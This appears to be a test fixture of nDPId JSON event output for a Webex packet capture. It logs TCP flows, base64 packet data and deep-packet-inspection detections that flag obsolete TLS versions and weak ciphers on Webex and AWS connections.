+00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":632,"source":"webex.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570672215,"flow_last_seen":1444570672215,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570672215,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41419,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":632,"source":"webex.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":1,"flow_last_seen":1444570672215,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570672215,"pkt":"ABoRAAACABoRAAABCABFAAA8MYhAAEAGVYAKCAABQERpZ6HLAbsAQeF1AAAAAKACOQgEvgAAAgQFtAQCCAoATND9AAAAAAEDAwY="} 
+00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":633,"source":"webex.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":2,"flow_last_seen":1444570672219,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570672219,"pkt":"ABoRAAACABoRAAABCABFAAAoAjpAABAGtOJARGlnCggAAQG7ocv\/vh6KAEHhdlAS\/\/9YlwAA"} +00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":634,"source":"webex.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":3,"flow_last_seen":1444570672219,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570672219,"pkt":"ABoRAAACABoRAAABCABFAAAoMYlAAEAGVZMKCAABQERpZ6HLAbsAQeF2\/74ei1AQOQgfkAAA"} +00939{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":635,"source":"webex.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570672215,"flow_last_seen":1444570672269,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1444570672269,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41419,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
+01402{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":643,"source":"webex.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570672215,"flow_last_seen":1444570672626,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3939,"flow_tot_l4_payload_len":4002,"flow_avg_l4_payload_len":667,"midstream":0,"thread_ts_msec":1444570672626,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41419,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}} +00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":662,"source":"webex.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570674487,"flow_last_seen":1444570674487,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570674487,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.243.0.110","src_port":55665,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":662,"source":"webex.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":1,"flow_last_seen":1444570674487,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570674487,"pkt":"ABoRAAACABoRAAABCABFAAA8CB5AAEAGejQKCAABrfMAbtlxAbui3tn8AAAAAKACOQgsWAAAAgQFtAQCCAoATNHiAAAAAAEDAwY="} +00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":663,"source":"webex.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":2,"flow_last_seen":1444570674499,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570674499,"pkt":"ABoRAAACABoRAAABCABFAAAoAklAABAGsB2t8wBuCggAAQG72XFdISYDot7Z\/VAS\/\/8cOwAA"} +00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":664,"source":"webex.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":3,"flow_last_seen":1444570674500,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570674500,"pkt":"ABoRAAACABoRAAABCABFAAAoCB9AAEAGekcKCAABrfMAbtlxAbui3tn9XSEmBFAQOQjjMwAA"} +00941{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":665,"source":"webex.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570674487,"flow_last_seen":1444570674600,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":187,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1444570674600,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.243.0.110","src_port":55665,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS 
Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"64ea4359ad4b496db653a3f30f7073e6","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01402{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":671,"source":"webex.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570674487,"flow_last_seen":1444570675110,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3907,"flow_tot_l4_payload_len":4094,"flow_avg_l4_payload_len":682,"midstream":0,"thread_ts_msec":1444570675110,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.243.0.110","src_port":55665,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"64ea4359ad4b496db653a3f30f7073e6","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}} 
+00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":736,"source":"webex.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570675941,"flow_last_seen":1444570675941,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570675941,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.229.158","src_port":51833,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":736,"source":"webex.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":1,"flow_last_seen":1444570675941,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570675941,"pkt":"ABoRAAACABoRAAABCABFAAA8SaRAAEAGwwMKCAABPm3lnsp5AbteGJvVAAAAAKACOQhIBAAAAgQFtAQCCAoATNJxAAAAAAEDAwY="} +00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":737,"source":"webex.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":2,"flow_last_seen":1444570675945,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570675945,"pkt":"ABoRAAACABoRAAABCABFAAAoAm5AABAGOk4+beWeCggAAQG7ynmh52QqXhib1lAS\/\/+1iAAA"} +00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":739,"source":"webex.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":3,"flow_last_seen":1444570675946,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570675946,"pkt":"ABoRAAACABoRAAABCABFAAAoSaVAAEAGwxYKCAABPm3lnsp5AbteGJvWoedkK1AQOQh8gQAA"} 
+00942{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":740,"source":"webex.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570675941,"flow_last_seen":1444570675997,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":187,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1444570675997,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.229.158","src_port":51833,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"64ea4359ad4b496db653a3f30f7073e6","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":821,"source":"webex.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570679512,"flow_last_seen":1444570679512,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570679512,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.243.0.110","src_port":55669,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":821,"source":"webex.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":1,"flow_last_seen":1444570679512,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570679512,"pkt":"ABoRAAACABoRAAABCABFAAA8dLdAAEAGDZsKCAABrfMAbtl1Abugj6duAAAAAKACOQhfOgAAAgQFtAQCCAoATNPZAAAAAAEDAwY="} +00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":822,"source":"webex.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":2,"flow_last_seen":1444570679516,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570679516,"pkt":"ABoRAAACABoRAAABCABFAAAoAphAABAGr86t8wBuCggAAQG72XVfcFiRoI+nb1AS\/\/8cNwAA"} +00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":823,"source":"webex.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":3,"flow_last_seen":1444570679516,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570679516,"pkt":"ABoRAAACABoRAAABCABFAAAodLhAAEAGDa4KCAABrfMAbtl1Abugj6dvX3BYklAQOQjjLwAA"} +00941{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":824,"source":"webex.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570679512,"flow_last_seen":1444570679526,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":187,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1444570679526,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.243.0.110","src_port":55669,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS 
Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"64ea4359ad4b496db653a3f30f7073e6","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01402{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":846,"source":"webex.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1444570679512,"flow_last_seen":1444570680091,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2527,"flow_tot_l4_payload_len":4094,"flow_avg_l4_payload_len":511,"midstream":0,"thread_ts_msec":1444570680091,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.243.0.110","src_port":55669,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"64ea4359ad4b496db653a3f30f7073e6","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}} 
+00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1058,"source":"webex.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570693238,"flow_last_seen":1444570693238,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570693238,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.243.0.110","src_port":55671,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1058,"source":"webex.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":1,"flow_last_seen":1444570693238,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570693238,"pkt":"ABoRAAACABoRAAABCABFAAA8LOJAAEAGVXAKCAABrfMAbtl3AbsPD\/XWAAAAAKACOQic9QAAAgQFtAQCCAoATNk0AAAAAAEDAwY="} +00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1059,"source":"webex.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":2,"flow_last_seen":1444570693244,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570693244,"pkt":"ABoRAAACABoRAAABCABFAAAoAxBAABAGr1at8wBuCggAAQG72Xfw8AopDw\/111AS\/\/8cNQAA"} +00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1060,"source":"webex.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":3,"flow_last_seen":1444570693245,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570693245,"pkt":"ABoRAAACABoRAAABCABFAAAoLONAAEAGVYMKCAABrfMAbtl3AbsPD\/XX8PAKKlAQOQjjLQAA"} 
+00942{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1063,"source":"webex.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570693238,"flow_last_seen":1444570693297,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":187,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1444570693297,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.243.0.110","src_port":55671,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"64ea4359ad4b496db653a3f30f7073e6","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01403{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1074,"source":"webex.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570693238,"flow_last_seen":1444570693766,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3907,"flow_tot_l4_payload_len":4094,"flow_avg_l4_payload_len":682,"midstream":0,"thread_ts_msec":1444570693766,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.243.0.110","src_port":55671,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": 
{"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"64ea4359ad4b496db653a3f30f7073e6","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}} +00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1112,"source":"webex.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570694561,"flow_last_seen":1444570694561,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570694561,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.229.158","src_port":51839,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1112,"source":"webex.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":1,"flow_last_seen":1444570694561,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570694561,"pkt":"ABoRAAACABoRAAABCABFAAA802lAAEAGOT4KCAABPm3lnsp\/AbubwQrQAAAAAKACOQiUEgAAAgQFtAQCCAoATNm5AAAAAAEDAwY="} 
+00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1113,"source":"webex.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":2,"flow_last_seen":1444570694564,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570694564,"pkt":"ABoRAAACABoRAAABCABFAAAoAytAABAGOZE+beWeCggAAQG7yn9kPvUvm8EK0VAS\/\/+1ggAA"} +00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1114,"source":"webex.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":3,"flow_last_seen":1444570694564,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570694564,"pkt":"ABoRAAACABoRAAABCABFAAAo02pAAEAGOVEKCAABPm3lnsp\/AbubwQrRZD71MFAQOQh8ewAA"} +00943{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1115,"source":"webex.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570694561,"flow_last_seen":1444570694614,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":187,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1444570694614,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.229.158","src_port":51839,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"64ea4359ad4b496db653a3f30f7073e6","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
+00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1230,"source":"webex.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570699074,"flow_last_seen":1444570699074,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570699074,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.241.32.14","src_port":46211,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1230,"source":"webex.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":1,"flow_last_seen":1444570699074,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570699074,"pkt":"ABoRAAACABoRAAABCABFAAA8OjpAAEAGn3oKCAABNvEgDrSDAbvRQeFHAAAAAKACOQhpXwAAAgQFtAQCCAoATNt9AAAAAAEDAwY="} +00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1231,"source":"webex.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":2,"flow_last_seen":1444570699077,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570699077,"pkt":"ABoRAAACABoRAAABCABFAAAoA2VAABAGBmQ28SAOCggAAQG7tIMuvh640UHhSFAS\/\/+YiwAA"} +00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1232,"source":"webex.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":3,"flow_last_seen":1444570699077,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570699077,"pkt":"ABoRAAACABoRAAABCABFAAAoOjtAAEAGn40KCAABNvEgDrSDAbvRQeFILr4euVAQOQhfhAAA"} 
+00965{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1233,"source":"webex.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570699074,"flow_last_seen":1444570699079,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1444570699079,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.241.32.14","src_port":46211,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"api.crittercism.com","ja3":"54ae5fcb0159e2ddf6a50e149221c7c7","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 